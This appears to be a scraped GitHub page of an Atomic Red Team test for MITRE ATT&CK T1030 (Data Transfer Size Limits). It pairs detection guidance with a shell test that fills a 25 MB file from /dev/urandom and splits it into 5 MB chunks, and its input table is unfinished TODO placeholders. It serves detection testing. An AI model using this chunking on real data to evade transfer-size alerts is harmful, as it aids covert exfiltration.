Skip to content

Latest commit

 

History

History
38 lines (25 loc) · 1.7 KB

T1030.md

File metadata and controls

38 lines (25 loc) · 1.7 KB

T1030 - Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)

Platforms: Linux, macOS, Windows

Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring

Requires Network: Yes

Atomic Tests


Atomic Test #1 - Data Transfer Size Limits

Take a file/directory, split it into 5Mb chunks

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
output_file TODO todo TODO

Run it with sh!

cd /tmp/
dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
split -b 5000000 /tmp/victim-whole-file
ls -l